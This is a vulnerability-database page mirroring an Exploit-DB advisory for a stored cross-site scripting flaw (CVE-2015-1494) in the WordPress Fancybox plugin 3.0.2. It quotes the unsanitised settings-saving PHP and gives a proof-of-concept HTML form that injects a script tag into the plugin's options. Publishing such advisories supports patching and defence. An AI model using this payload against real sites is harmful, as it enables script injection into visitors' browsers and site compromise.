Lucene search
+L

WordPress Plugin Fancybox 3.0.2 - Persistent Cross-Site Scripting

🗓️ 16 Feb 2015 00:00:00Reported by NULLpOint7rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 50 Views

WordPress plugin Fancybox 3.0.2 - Persistent Cross-Site Scripting vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2015-1494
16 Feb 201500:00
circl
CNVD
Unspecified Vulnerability in WordPress Plugin FancyBox for WordPress
6 Feb 201500:00
cnvd
Check Point Advisories
WordPress FancyBox Plugin Code Injection (CVE-2015-1494)
2 Feb 201500:00
checkpoint_advisories
CVE
CVE-2015-1494
17 Feb 201515:00
cve
Cvelist
CVE-2015-1494
17 Feb 201515:00
cvelist
EUVD
EUVD-2015-1628
7 Oct 202500:30
euvd
NVD
CVE-2015-1494
17 Feb 201515:59
nvd
OpenVAS
FancyBox for WordPress XSS Vulnerability
2 Mar 201500:00
openvas
Patchstack
WordPress FancyBox Plugin 3.0.2 - Stored XSS
16 Feb 201500:00
patchstack
Prion
Cross site scripting
17 Feb 201515:59
prion
Rows per page
# Exploit Title: Wordpress plugin Fancybox-for-WordPress Stored XSS
# Exploit Author: NULLpOint7r
# Date: 2015-02-11
# Contact me: [email protected]
# Version: 3.0.2
# Download link: https://downloads.wordpress.org/plugin/fancybox-for-wordpress.3.0.2.zip
# Home: http://www.sec4ever.com/home/

vulnerable code [fancybox.php]:
342.    if ( isset($_GET['page']) && $_GET['page'] == 'fancybox-for-wordpress' ) {
343.
344.        if ( isset($_REQUEST['action']) && 'update' == $_REQUEST['action'] ) {
345.
346.            $settings = stripslashes_deep( $_POST['mfbfw'] );
347.            $settings = array_map( 'convert_chars', $settings );
348.
349.            update_option( 'mfbfw', $settings );
350.            wp_safe_redirect( add_query_arg('updated', 'true') );

exploit:

<form method="POST" action="http://127.0.0.1/wp-admin/admin-post.php?page=fancybox-for-wordpress">
    <input type="text" name="action" value="update">
    <input type="text" name="mfbfw[padding]" value="</script><script>alert(/Owned by someone/)</script>">
    <input type="submit" value="Send">
</form>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Feb 2015 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.06407
50